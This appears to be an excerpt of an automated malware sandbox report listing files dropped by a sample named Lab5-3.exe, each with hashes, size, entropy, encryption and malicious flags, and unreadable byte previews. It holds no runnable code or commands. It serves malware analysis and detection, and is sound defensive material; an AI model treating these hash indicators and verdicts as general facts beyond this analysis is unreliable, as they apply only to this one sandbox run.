                                                                                                          SSDEEP:768:qOHKjjeobQwH9iTJ84VD0UNaoPFmU0l6Nv/oV2BBhDHB5sJw+hkHwdMl0nBZ:q3XQwH9iTW4i6aeFmU0l5e3LBjlsZ
                                                                                                          MD5:03D5120D2E443378377A365C780FCA83
                                                                                                          SHA1:AC581AA75A35FA1B53784CFB35CA179C6EA2144C
                                                                                                          SHA-256:F273056A9A38022621D088CDBF0B3F424C322CC778866B6A9B68DAE3010160CC
                                                                                                          SHA-512:D26F92E68695202E76B019404F427B59C74ED213078A34ACD05C66584E52481FE714E282F23E707E970FF88312DC32FC523EA54EA35485930EB3A2641B83BB79
                                                                                                          Malicious:true
                                                                                                          Preview:...O.JV:...)....vS..gS.:....+.'..[d.6.E ...o....|2~k...1T......,U....CyF.>.r..........v......W..5im2..'T..*&>.mb.|.8"=...&.....^}.....#-.JE.a,ot..L@...N*..s`m......Gp.<S....Z..:~#mv5..~.%.k..3p.xH...j..{.\o..{n..$.sN..nu...Z..wwp............S....6z.x@J...+._.....r!A.O....a.6..Qa...=.`..S.G.R..?4....Qbv.l...9..}..C...Q...~...{@X.N4j...G.%..,.q..f.~`...G......R.....nq+..}b..i....J._.....r.&./?*.].x....%.j|*mNs..6r..|.N..&..o.0...}n.0..E..,...C.A[......._...~h..l.....`n.k.\..`..........Z.Z.LU..ZQ...G....>...m$.M..<.= :.f.e..+.U...n.y.,..|.G/..n.^...p..J...".2.\.P..q.R1..R..Sy.$".W.K..{r/D..3.T..}.......'_........{....S#^...[.K.VF2.......u.\...TI.qR.W.3......<...]p].I.].{.]...Av.6.5DP...}3M>/w?.9..f.9.}[.rp..._n..\.../.G..8].K^....L.......m4T!...$..t2...6..t..6z..gk."...........7..x.N5..o...."..JtJ.z.I.}. |./....A..e.p...A..s....h.;.;..+.;........../.Y1....m.SJ....)..>-....wJ.....B.`/K.L$..z.}..b`.(O)...aG...D..oS...5.q..".Q......!...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995229892904213
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:A5JerGVThGLBfjeXyl+eI9ga13OjVGRRD8Xex1vAih4WxZ:AlVThgljefT9gSEVGRlIexpAihJxZ
                                                                                                          MD5:E691B10A1EF1EB8019C16F46883E09A7
                                                                                                          SHA1:89CF7D532342A8F071CDCDDE6DF0CF88DC676EB3
                                                                                                          SHA-256:794556F802FE1F3D8261B4497A4B1F4104BFAAF8B0183E2287058E3E9C236D8A
                                                                                                          SHA-512:CAFDAF45DD791CB44EF9E44ECB0A2E60A632DA7F58B0A62E3C3D3733B560583FB5CA3579D23FC133B8ECCAB7B09E9208AAE1667C1939230D7D82AADA0B84101F
                                                                                                          Malicious:true
                                                                                                          Preview:k........s....:.,l...C........IP..:..cF...+\.k-0..1l......6...T..v|CZT..h0..2'...9...*..wq......\..!.....}.;...RN/~.....O...?.."....."....#..t.........=..3!....@Kp....X!B....M..O....}W.|...;..._{......=...I.y.E...[A...L..lj~....qT........&:E.<...iD.C.'-...j.....`\.G..q..S.....t.G..I.b........0...tb_W$\..w..g.W.i....X.N.GB.=._.i.7..U.e...*.khDA.j...u....C,.....?.)..^..HI.Bmyu.@.>..o..B.......dPa..ZR@.,2.q...[.....x&...9S.U]i.4. ..p.$...P.f.Z....)"..U.s+b..''.3oi.:^.8.;|L.'.2b.#.mD..4....b...A..v.k..Qb&.....9R/..q(#VfQ........K....tl....i..z5.8..._..x...S*..]....d`LG?...bY\d.w...2....G.a..$.qp..?"....{L..`3.yD...++G......./#U.R..I.0..@...>...sd~.R..6...*..o....LU.3p.}. ..\3.....N.g.W..b@CU...I].s.'..f..r9|.Hh.9ZKzY..(.+*.../..,.`..WJ.l.Vu.'S0n...a.c>.... .....:.....}7.!....d.....s%..Q.!_5$..Rm.......?(a.W....M.H.r.q..._...V{B... .Xwig...\)T.T..:.sQs.q.x..D....r2K/....jl.)..a.8P.0u..tyAa.=....*.-.1[...%.9.?.Sda..Ez.9.z^.8^n....v.MCh...3..p
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995770501129724
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:P4E6pZSg32sMRD5y4vdb1lTIoOf8oX0YxFNSMvgSymFhTyJMbZgZ:z6rdMRD51loXXXzvgSvOWGZ
                                                                                                          MD5:A5196D3F820E667F94D2073CA6DE8346
                                                                                                          SHA1:A9D6DB5A804E4542C3964C0C7A980200EC259263
                                                                                                          SHA-256:E65D4F256928EDCEE9F6B1336ABECC30DD8FA6DE7C334D96F7CECE7282C06084
                                                                                                          SHA-512:7AE12DB7B39BDAD74D3A9C5BDE953E4CC7429E5590926BECC59B78E9070194939038A37CA6CC94EE572C01E492DCE924D11979D846E114C337A2E984BA889A4A
                                                                                                          Malicious:true
                                                                                                          Preview:.=....q..8#....7b9/^$....v..C....{..:7.0N...ABT....Sa."k..w..N.....,Uh....-.G.\0.... ...u.D"..RF..q.4....1..-.*|Tq...(.%.0..6~..gPBk......_#.y.5~.....v......#To.......M..s..O.5."..bN..~<~.w.....#F...Q....7,..Q.TO..M.T..%\.b.F.v..F..,..k.W...8".^..O..~.r.U.....U.Fp."R.U..._...E.D..]\...n1.o.x"9..... ......BFrWq..;..?.I...).s#h...Z.q1.Y.......z...Ie...x..*Q.T.Sp.b0.....*.....6.zJ.z...vq.Q....._u..{5..0X....6.!..).mL..._.......M..H..G...N9....t.w....R.u...0..........7...Y:#.s=...vw.g...B..bE$.)....p.4',. ..."{....J....:$)....c...HBp.:G.lu.SX..q....n.1.c.....a..7.:/...y..\.P..E.|.....m..JX..^.\Wk.MF.i0.4..&.o.y<..........|..N..D..E....._...F.....:..'.*......(.6N..E.i.MVD...../..{;T.*.C.~.0%r.+H.$..Ac.U..)I.........4.......!..%}.....Z....gs..-..3...p..3..lJ....0..+...e=&........JtJ..J.j........b<..Q....].y.....U.h..r.0..Z.Se.y..a!.:.....r8*.t`.z...u.....B.M.$o._.3...tt2[..s<b...C.P..q.k-..V>.....X.q.e.{a....}y...v./..3....c.4...O....2.&.A..Q+.u.h.i...~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995062412733887
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:JjfqmqtzI8DPgRzByrPIihdGyU1lMFqXCLUHWrNZ:Jjfqm04binGyaoo82WJZ
                                                                                                          MD5:BE74C8C6B6F7E7B5AF4BBCADE6929D30
                                                                                                          SHA1:613B2757A9DCB77FE5BCF20648932265D1D6D2C2
                                                                                                          SHA-256:FFD80D9EF34B172346B6499571CEBEC69BCA50767E17230BE90CC758AC89597D
                                                                                                          SHA-512:2170EC2764D7070B2228F26F46C04A869688236FB5E3DD8B590AF188DA09BC1F20C6FFD036CE8E30738E4BA7D838C87C5172C89AD4058F68345866A65F9B45A6
                                                                                                          Malicious:true
                                                                                                          Preview:..Q.h.i7eS^...\UF.C.r.P|A..Qc..5....W..s...0X...Y:C.^........V(...Q8.1t.t\oQ..kb!;..a..?\.......#...f?...q..S*<1..[0...=..A,.!..,.~.).A.y(jH4..R.`.&A3B....e....)..X7#....Q.N..Kv...m"Z...i. .c..>....z"...r-...Xv.,.v.....f.......V'Z..\......+n.Vb!U.1.z./.&S!.pa...U...&....*a..~........./.r.N...;F.....N.e.q.I.D...7.v...k.&...R:.....'.R....D....]%S..F..m.F.K...<.j.|...\e..........] .+...P;......A...@.e<./.}6......4.....xy.Q.u.<,o].g..U8..mW3./....X^.jH.:.....`.L..+.....0`P..lk......Q.....Z.T....L.........j..f.U....7...1D<.y_...P...C".fOZ......P.....^...5.....u.<gd/u.9n.{.5..@...yo4...|1.&q.8.HZm...U..9s(.nC.V.....\Kzx..........J.4.z.$.....Po_.j...AD..f..\.1E.V..jX..."..`.J/w...|J.v..s . ..G....H6.....f.E:W.A.d.5.!.cJ.D*.._.z.xdbc...$L.`...0.)..i..,...p..,.....~..kO|..../..K..R*N.H.\S.(.."..O.z...6~.G..T......pX;...L7.f.i..tz.. k.E.#...F.._..U.....)^uGJ...:..%.|M.4'.6.>Ee.<h3[."..p..H..oD,n....(...U.[.qL. 1.....5..oH.{...&.r....x-..n7..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.994943036583781
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:+zH1Vhbfi+6CR2EHsaPGp6kkxevNxNsM+9EXKnVNpApmZ:4H1Xrc4saOpZxyM+92A7xZ
                                                                                                          MD5:5B5D0B3A46C872DB996FA6DE4CB288BC
                                                                                                          SHA1:1EB692C180AC917E3F010595763EF936C53B511D
                                                                                                          SHA-256:F23B48766A48B5BFC2490CCE1FF1123E52DDE1338D50F4DC4469B8F4BF2F85D5
                                                                                                          SHA-512:C33E4B315CD9DC2DFC655E48166EF3E475410F518AE6E435A1867B340637F1DE81B41032952EC518F19AAAB494087AC33FB1585D1BE42F81A5A81E9BDA0FB5F0
                                                                                                          Malicious:true
                                                                                                          Preview:'g<q[.....p..dl.B.w..j.<t ..p5....{..X.~....b...\Cw.|..F.....>y..f..|........]..5Q......c~.p.n7.R4..~..M<..J./J....-..j...E..-..~.m=s..1:~#L....VS\.fGg.....?..q.{(.BR...S.M.._1{sY|y.EAH......@q..:.........N.[..9.).......0..s...gH#..1.a.5..k.w.........x..K...R........P...$F.p........o....mgF06.%.`o..bu..........G.Q.....I.+.3=._.S......K.K..|.0..%~u..4..2...c.....'..V..@..E...,..j@{..s.%.'.... ...%M3E> .B..PA..M....'.n;T..g.-.B.....A2...._1.|$q"K&..h......o.|......VB.^.V....u.F......C..]......,..... lN....uve...T.....OP .3.t...y.H.y.....c.%.C..]IJ,.....>..........T....o..EL....dD.......^E.. ..'..a...K../...8.....<N.d.........Q!....S.[..[.*C.u#. ..u2.Tl.v...M..^....<jO..z.).o.}H.>..e...cZA..U..;]Zi.......0.Mb..T+.N..p.z.......M.`...E.. .S.N.kf............S..m..O.e.h?....#.Y..R....-.... .G..@.L~...cm..@QuW.&K..9}.-...R.....Mz..y.%.".8s`IKa.v.P-..TD.Gy6BN>.. ......x.+...GM.0.".;.....*.......#df.R..1.B.. ....c.i....@du....xY..ZY.....(.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9456
                                                                                                          Entropy (8bit):7.981822362595688
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Fl0Rq1iSZ72GhSnAFjJs5i2ENAZdKQGWiYLJOHkqDJatbZq0Cb:Fl0yiSZ7hSqmSrQGWiYNSJahZqtb
                                                                                                          MD5:4E1F22B95E59828E0E6B29B248D861E5
                                                                                                          SHA1:FCE8A44C06CC7E565AE1C42237A4AC34111ACCEE
                                                                                                          SHA-256:07DD1BE52FF89B217698C16F76D98169E13525019CD8281A00A5EED51F33A7C1
                                                                                                          SHA-512:44CDF2D99A9BA605A14A476ACAEB74D6F32683716C014FE662AC9F237B598CA1D94524E468B8DE5ACB1964E3D58417A6752C0017431CF94AD838575056EE2D2C
                                                                                                          Malicious:false
                                                                                                          Preview:$d.Hj./..(M..x@b..7L...c.....M1....USt.c...4....u50..4....S..!ar9....*g%.@#.D...^....7Lh.N...@.....u..O.&..lDXst..B........t.V..k.5...i.Q.I......R..2..W..5v.o@....VY..V.T.L......P..t.4\.........A....%......Z..!.t.......J........B.(w,=..Q.)..M....(a.VD..w....W-.@.I.|.f...m.b..}....kTR3...X|.s.b...<K.P.g.s..<N<..>..l...8G.(.e.....Dp..;.....nR3k}A..,....kpM.........=)i.1-u.?.;...7...A...!.S.w.\.....g........p*.kf_x.K.4.`4.8...y....3.X.[T.6..&..8..Q.(..i.C,h.*./....!f..MN....^.;~G..X.....\...."....{b(...b..[m...}.Bm(.n,p.....c.j.........X.....3.a{.S.EN......f..W/4>.s...gz..w$B....)....]...:eG..5..{g.o...1..5-V.$.-.LF.../....5.....f..4W...#...m....Oj.)o.Eb........d....h..6..KN.......XI$......<.h..W..4....../...9c.T......K....o..... ....._.G.0..]....5O...g......O.:W..C.k.%.u...yi.~B.....]..{`.....w..5+hY.....y.0r....d..N.*.0.8z.~..+...g..".2|[o.........Nz.e..[.|TS.V..b......e.....k8..m...W.ES..........p..x.r.V.y.C.=....f.....S.....O.(z..dj.)...{6(.i
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.994763698525397
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:5+4cO90ZmxovQGtKYlNWo5O9fAOq2Ed6BpBwrEnflSW/IlyBGZGy2ouOZ:5+q9dxoo2Yo5O9fLZEwRCEtSUJBG/2oj
                                                                                                          MD5:8739A8218BDDADC4131F34842A615ADD
                                                                                                          SHA1:E562CE35BF1176C51F9B541E5D03789BE67F158E
                                                                                                          SHA-256:A83BA00757B331E566B9DDE6275B46EE9C912515EF3D21394C8AC2A3EAFF9F9E
                                                                                                          SHA-512:C64C92986FA481C47377B4B0ED9BF3384712E5D37EC4955481293D708D724301D3588E3FAD590404D43AAA9AB8588EB7B3FE0898B80CEE94657623E49542359A
                                                                                                          Malicious:true
                                                                                                          Preview:...}.;.....w..9..W.8s.&J..z......b....T...cF..T.....:..s.o..(.p.........u./$.............p.t..n`O..A'0..Q...L/....;*"..<.f.....^t....=.h.T..-.w;....f.S"()g...}.$9.$.)c..^M..L..j,..&.J..k....i...7.!..v./.mZN.f=.....Q._p&.F.....9..h..[........+.K...I..........@..*...-..4p...M.:...........d.e.J...XE..a.B.C... ...2l...?.R!x."I..0..j.I8-[.a.......=.$y...|eh.W........x.. ..8.0...m....M...X/y2G.,d.......I..x:.......E.P..3.....L..4 A>=.]...b...`..#..b..7..%ht.%*...4./3W...!*.I.Id...30....O......(.$m=.....i....d....X....x..t..E..r{....M;.y)p.hP6.....{.....KY...`f;y.{."n..J,E..8.....bf.x..46....r5.......O..P..X.V8..h.....^ D..c..(...<.o?..P..;.1..hf..M4.[...y.....P.R......z.\[..L|.a...HR.'....<....k...>.u..P....<..p6.%...+k.......f*A.......P.,.5.E(.M.v..E.M.AU..}...D.l..zc....[.6B..s...D.`....t[B..}.A._ .....W.A=Avp!.T%.I}.76...>,#{.pS)...51..2...*G..X..Ta.|.j..."..}KmY......% ..c.E/Z.rF"...4.J.......)T..]_#'..J..Sx.....QlL....u.kr...hJ.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995558741935768
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:J8FDkuqaRSjJaqqfLhckKbGwbiVNwPooidq9EHzyNjcAw2gWupycPCsBdZWvoXnN:i3qWhk9aNwQoide/oRUsnX7Z
                                                                                                          MD5:674DCF7A8578F9306E723E1E12A9E917
                                                                                                          SHA1:4BA81E05F4185925600E4E495678791789725685
                                                                                                          SHA-256:5194497E0A2DEF8957A33043CA1CC5F8F9DC381C5D83A290D09B088889B0042F
                                                                                                          SHA-512:C57E19E1AFE17539220297EF143523309BB475823F2C7A9598A0486C3F7081DFF6F3A3093D543693A27C37A171B24C64BBF3A2E6F09E30F515BC2E3D8F6C2C97
                                                                                                          Malicious:true
                                                                                                          Preview:^.J+..Q$.(..Z.H/.&=..U..*..0.5....6.d.{"...7..9..r.....Q...X....Q./.....zcH(.l._...:...T...`".&~"...<V.cD.?.y1!.....d7..X..N.G:...1.z.'..K.2:I}}.}-.5|.e.3...x.......6.R.*p(..WOJ..B.)|....$r....F|.i...?.....C%P...I....../..Q.s..r%.EiAKZ}1..=...#'.f.Ka..._718O5.(...hn..-|mM.X.{3.=<.:.ck.<U...9+uh..h_.@..V..R...<........,...O.r,..9P.........6.=.^...:;7...%.Ua......dZ.j.*.z....Fc..........*.>....mk..g....R.$|At..X..~..#.]V...W$....aTK..U...Ir..S...d.s...y......3.......RI.~.O?....F.*1.z....u...8...4.T...J[I.KI..N..,..L....S$..u......D..:.....z....}..]..Z.....b.;#.C.6.....Y.e.g.e&..[.`.BlI.l..a.F.....A./f....=.(?.=Y..u..zy..aLrKEp.3n...I.1.....M.c..........r.:X.|...G>.?/>i...._.kL..t.. B..=.Z.1b(SR...\.(..:..DuRY.{>/..=t..^.Tx.....Y..R/.....a.~...ec.oT.25...,.!..!@..LUy_ .p..n..I.....#.1......f.kD...A.1.#....K...d=jy..../...{>l.-.?Zx=.f.eHz.....j..........U+.V.b.I...'r.....$.....H.^bw&.s.%.P.<.._+....f.GV..xa...S...<...u.lj....Q'w.,.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.994794335695302
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:qjcnyCLzPfPBgyCWtZ8ztsl9qPbOXeenMSW4KRtVHdU/vDWZ:0bafPnHtOztsXbXbMSCk/7WZ
                                                                                                          MD5:B1C6831C179BD09026034857324204BF
                                                                                                          SHA1:D7BC869B46E25DDB91F1A6488737A6F5EFEE4DE6
                                                                                                          SHA-256:4B3527937FAC7975AD9FA4FBEFFAAFDDA33BF30F59B612CCF14885D93F5D3FED
                                                                                                          SHA-512:ED8D3E5791820B76D04C8060E4EB2412F9581FEF88A89B144CCC918E9107ED2B26EBC958F28631A99C97D80F0B519FED174E4E84A24940ADCFD737B9922A78BE
                                                                                                          Malicious:true
                                                                                                          Preview:uO*....,.....V...R..}8k.fH..r.......%...pq^.......z.......k....]Zu..:...T.........e...r\df...;...Gp.4..1.x....2...'#._y.``.}$.|....z....Oj..N.(KW!.bK...<@I.Ae.(...#:q...7lk}.#..$.?.F*J....2~2-...m@@.....F."./.=.........}E..g..=...3.Q.9[!......N.6.'.c.....~..x....G....'?u......wZ8Z.Kx.J.A.l...d....`...j...<D!.O...KgO.6|.e.W~.-X.P...l.U[qW.f..T.qj.....R#.S#..]..v)S...4,..J.z....s..k....J.)..d.8.`1.........,....I...SY.....P.N>P.9....p..y.-6.....#C.L.i#.v..9....N....."...3....mX..#...Z.....;s..W......3f..).|...a.TC_.Pe..........w.,......^.e...dt...o..`y.O."I..aZ...G..Bl.J..H....?.<p...m..(}..Zfn..4..x.@F.|,...2.4"..N.+........G...s5.t..Ol[/....qq...'..h....,...u".m.$....yS,.J.wk...}.~.~I.ql..J..d.~.g....(......i.. a. .B....2z....$.).\A..H.$....e..K..=..q.V....p.r...zX.;.%G^Qf.h.w....a.r;-....l..K.?..z.ce,6......j..l..D....QQB.#.....:.F*.V.iFx.F..Ew...5.L......=PW.R`...0]U....\..&..oU.8w..._..........jz.]...$n........u.rJc.t.><.>EJ.X...h...P.......^.M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.994909837779939
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:P/9UEFQfIURLzmgdUAYDFXZNNPaOhDxTIq3JTyWu5gD8P1EeDZ:nvOIAKgdvYDNZaeDB3yZyo1ECZ
                                                                                                          MD5:A6F4E43600DC9781429517CB4EC935C8
                                                                                                          SHA1:31D1779F39F9740B34050A60DC81D0E9D4DBBC84
                                                                                                          SHA-256:8BD7D0105E4EAF1FCE4A8709E0E2DDB30F25BF7C4E95A0669307AE5004D12B5B
                                                                                                          SHA-512:4FFA3886B8A2D991591AD0C23D864B4E7C585235786DC6FF0326B6C4AE8989F93637279D31716E8835E321E0C9755BA4AF7A7DCF63A9D599948F542C82D2FEC4
                                                                                                          Malicious:true
                                                                                                          Preview:... v...E..`\.......D2.%........ ..@J.`z.Q$..l....n.1....Md.D.h.6W..u....a..C9..6+@.b.Z.$l....X:N..=#sJ.OVm.IB.Q<.2.V..!%D?....X.:gZ9..l.N.m...>.dz..)..+...Xa`.8v.....T,.D..r..%8.r..ZR.2s'U.3...>ta+..A.)......B'.......!.84F_VUJ...}h._.NL..I.....&...<.o../.X32.a.......?$.p|....Vd_i+C.%c./A.K..s'x.a a.R.t..|p.@......F#>.4a|.'.f..NQ;qR21...3@Y.....7%.........]....#..vSQ..c..J|...B.......q..Dh.~.Sv..e}..pn....SD}..4.....h.x..d...[.u.........s..F.......x..\?.}...SG.M../...K..x..P}...Q..1.....d.B.....Cm.[..O.....-.JSu.....y..(..s...Xuo.......Z.7.=.".ym..san..R.....8...?.|...).cBP.]..............e-A...{..Y.........z...B....}.{OX.G)\k.."0.z.0.4.c@h.a.eT&.L.3..6.R4."$"~.+.F.f.......H)Ul.0@..1dQaO.c.w.=.n.....8$.:.Zk/+...W~e(.r.h....n......z.a...3.R1.P........S...........I.5.MW[k...lg.L.L~y.........> .4......vo6{.s..........."P.......:...F..,...M2....<b.`r.U.<g....zo.|....zOH$..."'.({.^7..2...P.En......K.>.D..o.._.%g..H....x<..z....v`o...........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.9953831222207175
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:g4/MUOllqREbhZrzsntPbbmlDN8yt0AGyuxP/7qqyZ:glBlMElZEntzbmlxbbY2dZ
                                                                                                          MD5:AC0D51D7292D05F956CDF7A1259973B1
                                                                                                          SHA1:ABE64228989E2515B9AD12BCAAC7D39765742905
                                                                                                          SHA-256:CEF8DC7D8326498D97364770B75CEAAF725C3F372B1EBC1960AD08DB58F9C785
                                                                                                          SHA-512:D44B6C96B307CA5620B0699EDA51564E2559423C38BF7E2A141619C450E125702AC0BCB983B4FBB33378AC3128FBEE8298A0278C41050F4E584CD9869EBAFA1C
                                                                                                          Malicious:true
                                                                                                          Preview:.\c.v.G....CN..xT:w.u....|7..&X....dd..N.|..$Kh..f:.|T.5.p.....4..A.0...O....r@....Dzm,.c.!....o.S..8!...`...^s.._...E.......... ..E....'.7..4".....l..0...4.~.. .8c]M...&....j.Cx.......}m..}.x.`.6.r.Y.Q.V.A.....B..\...A....,...+sv..yv....j.p.([,.}.7=....O.H.t.w.d.1.X?..y.|....z.,W.........b.e.v..K..V.v..g.Ewo.M....S.8...:.{..f.@.......2.^R..<D2P..M3E....h@..Vr...|.*."T.\.L^.Hn.;<......'....&D.F....r....\.j[0~......a.Svu@u.Qv.0....f..=8.C..-a.....&...0-.b.[.je.U}..I.#.....q~.}O..|..#.*...e..f.".....h.dW...F.-.=Bt@.)z..G..<.&...'<f...e.....r....A...H....U.......Ln.{.=_,jr.~.:tvRf.+.3......>..c.D..8..}...q>Gz=.C..C.,.8..E^..3..F.i.Eg..zoY.....m.(.F.u.....I...+'8..Y....r.6~..S?@...(O~..}....*..Y.oh.Cj@.+..R.9.L..0i........C.5.D.. h..n.'Q.w.qG.`.R..........mZ...E._.k.b..T=t.M*......J.U..x8z...VL.k-.i.z.....L_........-.vCHuUV|.F\f.H....X.Oe.M.X[.*.r.<.!2.b..f:...r.....).Ps..W....K...C|).HzI.....A..v3.?6g.@l.3.I..(..e.H.?L/.`*.OV.^....p......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.994821470056704
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:x/ljIPEowZ70GTaWFGkYtsJy/cQ0RqxmfQ0vYiEGH11RMYqwDB8K/pZ:x9MEJl3TaWFRqsnLRIG1m7fK/pZ
                                                                                                          MD5:8CC044E917E8B66EAB9298D07365F602
                                                                                                          SHA1:E6DACEE5D9571B179D104F1A50FD831558708BB1
                                                                                                          SHA-256:4D50BA58D24E939BC900893F20937CE8413B703DA230D8E43ECDC5336F4B4E53
                                                                                                          SHA-512:E306356F7DF9585CAFA1E6B2395406D8AA7995FD7CA8CFA03AC2B32E3A0A0B9A13DDD4F5396FB4FF0FD4E2346F9E36C43A2BC71EF6B867A8E7E6CA94916C9DCC
                                                                                                          Malicious:true
                                                                                                          Preview:.....<(Q.?..1r?.....M.s.|.]UM.!.6.....U8@%....5...i.y%I.G.......|..".1PYdsVH.\.b5;n....a.u..F.1.v..5........j.es.-...<.>z....\^'.<..l..D.....0....h../...(.M..........l.\.o.}.T.KJu..u......i.)[8..itz=J....D.'G....{.4.w.......|T...q.....s?Y..PyxhN...[-...e......,&xL...3./sB.v.M....Y.,........O.|.W...G._...$.u$.-....Z...,..d.5......Jr....dX.......=.^...o..P......@.*.&).?.w..p."kh..b..>}.+..o...HJ.c..~...gM.P".zz..g5.....X...Y.........<3.....rD...)7K............|s.e.....t....GZ..."!?@.G.lWY..Hs..5p..[....7z..s.c.46;p.Ib1..Sx(....M&.A.....;..O.......J.o[Gh..P..pv.6z.I..q...o...Hc40.`j...... .-@.u.X..N.%.e......u.-/...`Xgl...s....X.f.t.p^n.....?,...Q1........N...'Te.....o....,..1#?..`I>AN.$.....7;....,L\e%.0.4A.0w*S.z*!|.mI.[..?*PF.....#..6.^.o.(......#..f...'.........K...jl.D!.F.jTc.\.R...L.A..CC.zU.?.....TkMxN<............fS..8].Z..$+P`....9.........g..Y..%....i+~...1.G..J.p"...._..7.g|..z.Y4..-.F.....d.:W.5'.#..+.........1.k...b.!.W|.t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995529205582326
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:KWDucLAKQ1aSHriv7/6VBVxri2f4B8qiTVmLXJNlvSujORDhG6ofHatI6wBRzmJP:hBLAen7/6NReXJNFzy7QStI6wBhmJFZ
                                                                                                          MD5:1610EEC7AB7D70E8F9C673F72E69DEE7
                                                                                                          SHA1:5B98E2CA972548A9F0A17BA37C20E1479F9E6FC4
                                                                                                          SHA-256:F1D1DD34700623B3674A62F7BDB3275F1C126C01F2C32F82E7E6AB72B33DAB3B
                                                                                                          SHA-512:0EC3BB674FCB606E33A39C6DBEE6975205B6FCEFFAEB150F471D26AB4E9F4E6F45FA42BF4FF4CC2E53BEC3EC8F7EF8CD2A148D593ADF8F05878E0EF12F4B4FB7
                                                                                                          Malicious:true
                                                                                                          Preview:C}.....M......a.%.yG.8f..O..o...QJ.M.Ygi....L.5LW.&....ml..#...B.y.\kX..R4...4...#.%......^/RE...e........=..Pt?.X...+P..f..R.R..!..d..0.U....l..55.j.f.*S.%.i.4].=....I.c..4.....0...>..|R(E...n=4...O...5%.1...\<..c:k.L6\.i_..t.D....p......u..,j|s...u/S......+.6.....c.W.rdv,...o.s..A..("...p...Z..V..|..R*.f..,e.[......b..V]..../M8..H......g..s...0..r..%.x...V+....d....5J..r.`)..A..>.I.]....p..M....d.=p..Q...,..T}.P[...W.e..... .M...6.N.$U...7q.9.=..]...._.!...E..E....3.)......|......[.A.;v..O#u.d..ak..../....80..t..\6.Mx..pu|...U.....`Yz>.....+g..A?....7[..K......l.&.j_(......rW.U..Ya.H.......^...D1.....[.....w<I.....R.......w)E..|..i....=|2.n}.<A.....[x..N^...9..^..m..P\N.WY'...-.4.(gI.cm..*J.L...J.:+..+....?...F..L.H*.'...]?....k.&.p...{..P{_...k..K..K...H=.Ue.T...Q}.~.#..s.x...r_...(.e...n"..T......g.....=BG...9...@....iF+`.h..#..2&.*.N.;....1;Co.b......w....../.w!...jG..[.N-JY..@.3....J=.\w.z.'T..t.M...p,*..&&.......Cd...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.994563727734028
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Jau71f7kseGHQDZCsdpmrKVxubNXM/EhpDpiHAx+oSa9h3NSy/nZ:AK1f7ksnwddlSNXM/E/pdxR1sy/Z
                                                                                                          MD5:E4A59F8D3292B0A497BA6AEE96495F9A
                                                                                                          SHA1:E82FA06C7B68F2E5D9F7AAC0317E2AD285865E64
                                                                                                          SHA-256:98DB4671C60509515448CE95B9648A76A1B6CE0F559B4771EC7FAF4F713F47EF
                                                                                                          SHA-512:795178E5AFBE87C64F4F3B95BF3BA142973692DA986CE8951C679009E9F93634A8E54DD83ABF01A4230BFE65494298B2786D6968072CB8FA449E46FF23AE8F50
                                                                                                          Malicious:true
